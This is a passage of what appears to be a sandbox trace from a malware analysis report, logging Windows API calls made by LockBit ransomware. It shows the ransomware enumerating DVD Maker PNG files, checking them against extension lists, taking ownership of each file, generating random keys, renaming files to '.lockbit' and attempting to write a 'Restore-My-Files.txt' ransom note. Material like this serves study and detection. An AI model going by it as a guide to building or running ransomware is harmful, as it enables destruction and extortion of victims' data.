pbBuffer=0x1ff18f4) returned 0x0 [0087.986] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.986] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.986] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0087.986] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0088.073] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationRight_ButtonGraphic.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationRight_ButtonGraphic.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0088.073] malloc (_Size=0xf0) returned 0x1ff1e60 [0088.073] NtSetInformationFile (FileHandle=0x3c4, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xf0, FileInformationClass=0xa) returned 0x0 [0088.074] free (_Block=0x1ff1e60) [0088.074] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationRight_ButtonGraphic.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion") returned 1 [0088.074] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\Restore-My-Files.txt") returned 81 [0088.074] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0088.074] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f59db34, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f59db34, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4fd79845, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xbd0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SpecialNavigationRight_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0088.074] lstrcmpiW (lpString1=".", lpString2="SpecialNavigationRight_SelectionSubpicture.png") returned -1 [0088.074] lstrcmpiW (lpString1="..", lpString2="SpecialNavigationRight_SelectionSubpicture.png") returned -1 [0088.074] PathFindExtensionW (pszPath="SpecialNavigationRight_SelectionSubpicture.png") returned=".png" [0088.075] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0088.075] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0088.075] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0088.075] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0088.075] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0088.075] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0088.075] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0088.075] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0088.075] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0088.075] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0088.075] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0088.075] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0088.075] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0088.075] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0088.075] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0088.075] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0088.075] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0088.075] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0088.075] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0088.075] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0088.075] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0088.075] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0088.076] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0088.076] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0088.076] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0088.076] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0088.076] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0088.076] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0088.076] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0088.076] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0088.076] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0088.076] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0088.076] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0088.076] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0088.076] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0088.076] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0088.076] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0088.076] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0088.076] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0088.076] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0088.077] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0088.077] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0088.077] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0088.077] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0088.077] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0088.077] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0088.077] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0088.077] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SpecialNavigationRight_SelectionSubpicture.png") returned -1 [0088.077] lstrcmpiW (lpString1="ntldr", lpString2="SpecialNavigationRight_SelectionSubpicture.png") returned -1 [0088.077] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SpecialNavigationRight_SelectionSubpicture.png") returned -1 [0088.077] lstrcmpiW (lpString1="bootsect.bak", lpString2="SpecialNavigationRight_SelectionSubpicture.png") returned -1 [0088.077] lstrcmpiW (lpString1="autorun.inf", lpString2="SpecialNavigationRight_SelectionSubpicture.png") returned -1 [0088.077] lstrcmpiW (lpString1="thumbs.db", lpString2="SpecialNavigationRight_SelectionSubpicture.png") returned 1 [0088.077] lstrcmpiW (lpString1="iconcache.db", lpString2="SpecialNavigationRight_SelectionSubpicture.png") returned -1 [0088.077] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\") returned="" [0088.077] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationRight_SelectionSubpicture.png") returned=".png" [0088.077] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0088.077] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0088.077] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0088.077] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0088.077] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0088.077] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0088.077] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0088.077] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0088.078] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0088.078] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0088.078] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0088.078] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0088.078] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0088.078] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0088.078] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0088.078] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0088.078] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0088.078] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0088.078] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0088.078] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0088.078] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0088.078] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0088.078] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0088.078] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0088.078] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0088.078] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0088.078] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0088.078] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0088.078] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationRight_SelectionSubpicture.png.lockbit") returned 115 [0088.078] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\specialnavigationright_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0088.079] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0088.079] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0088.080] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0088.080] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0088.080] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0088.080] RtlFreeAnsiString (AnsiString="\\") [0088.080] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3a0) returned 0x0 [0088.080] malloc (_Size=0x200) returned 0x77d800 [0088.080] NtQueryInformationToken (in: TokenHandle=0x3a0, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0088.081] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0088.081] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0088.081] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationRight_SelectionSubpicture.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0088.081] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationRight_SelectionSubpicture.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0088.082] CloseHandle (hObject=0x3a0) returned 1 [0088.082] free (_Block=0x77d800) [0088.082] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\specialnavigationright_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3a0 [0088.082] CreateIoCompletionPort (FileHandle=0x3a0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0088.082] malloc (_Size=0x40068) returned 0x3d70048 [0088.082] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=3024) returned 1 [0088.082] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0088.083] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0088.083] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0088.083] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0088.084] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0088.084] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0088.084] ReadFile (in: hFile=0x3a0, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 0x0 [0088.093] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationRight_SelectionSubpicture.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationRight_SelectionSubpicture.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0088.093] malloc (_Size=0xfc) returned 0x1ff1e60 [0088.093] NtSetInformationFile (FileHandle=0x3a0, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xfc, FileInformationClass=0xa) returned 0xc0000008 [0088.093] free (_Block=0x1ff1e60) [0088.093] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationRight_SelectionSubpicture.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion") returned 1 [0088.093] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\Restore-My-Files.txt") returned 81 [0088.093] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0088.093] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f55187a, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f55187a, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4fd79845, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1302, dwReserved0=0x0, dwReserved1=0x0, cFileName="SpecialNavigationUp_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0088.093] lstrcmpiW (lpString1=".", lpString2="SpecialNavigationUp_ButtonGraphic.png") returned -1 [0088.093] lstrcmpiW (lpString1="..", lpString2="SpecialNavigationUp_ButtonGraphic.png") returned -1 [0088.093] PathFindExtensionW (pszPath="SpecialNavigationUp_ButtonGraphic.png") returned=".png" [0088.093] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0088.093] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0088.093] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0088.093] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0088.094] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0088.094] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0088.094] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0088.094] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0088.094] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0088.094] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0088.094] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0088.094] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0088.094] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0088.094] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0088.094] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0088.094] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0088.094] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0088.094] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0088.094] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0088.094] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0088.094] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0088.094] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0088.094] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0088.094] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0088.094] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0088.094] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0088.095] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0088.095] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0088.095] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0088.095] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0088.095] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0088.095] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0088.095] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0088.095] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0088.095] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0088.095] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0088.095] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0088.095] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0088.095] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0088.095] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0088.095] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0088.095] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0088.095] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0088.095] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0088.095] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0088.095] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0088.095] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0088.096] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SpecialNavigationUp_ButtonGraphic.png") returned -1 [0088.096] lstrcmpiW (lpString1="ntldr", lpString2="SpecialNavigationUp_ButtonGraphic.png") returned -1 [0088.096] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SpecialNavigationUp_ButtonGraphic.png") returned -1 [0088.096] lstrcmpiW (lpString1="bootsect.bak", lpString2="SpecialNavigationUp_ButtonGraphic.png") returned -1 [0088.096] lstrcmpiW (lpString1="autorun.inf", lpString2="SpecialNavigationUp_ButtonGraphic.png") returned -1 [0088.096] lstrcmpiW (lpString1="thumbs.db", lpString2="SpecialNavigationUp_ButtonGraphic.png") returned 1 [0088.096] lstrcmpiW (lpString1="iconcache.db", lpString2="SpecialNavigationUp_ButtonGraphic.png") returned -1 [0088.096] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\") returned="" [0088.096] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationUp_ButtonGraphic.png") returned=".png" [0088.096] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0088.096] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0088.096] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0088.096] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0088.096] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0088.096] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0088.096] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0088.096] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0088.096] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0088.096] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0088.097] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0088.097] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0088.097] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0088.097] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0088.097] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0088.097] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0088.097] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0088.097] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0088.097] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0088.097] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0088.097] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0088.097] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0088.097] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0088.097] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0088.097] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0088.097] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0088.097] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0088.097] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0088.098] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationUp_ButtonGraphic.png.lockbit") returned 106 [0088.098] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\specialnavigationup_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0088.098] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0088.099] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0088.099] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0088.099] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0088.099] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0088.099] RtlFreeAnsiString (AnsiString="\\") [0088.099] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3a0) returned 0x0 [0088.099] malloc (_Size=0x200) returned 0x77d800 [0088.100] NtQueryInformationToken (in: TokenHandle=0x3a0, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0088.100] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0088.100] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0088.100] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationUp_ButtonGraphic.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0088.100] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationUp_ButtonGraphic.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0088.101] CloseHandle (hObject=0x3a0) returned 1 [0088.101] free (_Block=0x77d800) [0088.101] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\specialnavigationup_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3a0 [0088.101] CreateIoCompletionPort (FileHandle=0x3a0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0088.101] malloc (_Size=0x40068) returned 0x3d70048 [0088.101] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=4866) returned 1 [0088.101] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0088.102] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0088.102] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0088.102] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0088.102] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0088.103] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0088.103] ReadFile (in: hFile=0x3a0, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 0x0 [0088.113] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationUp_ButtonGraphic.png.lockbit", NtPathName=0x3d6acc0, 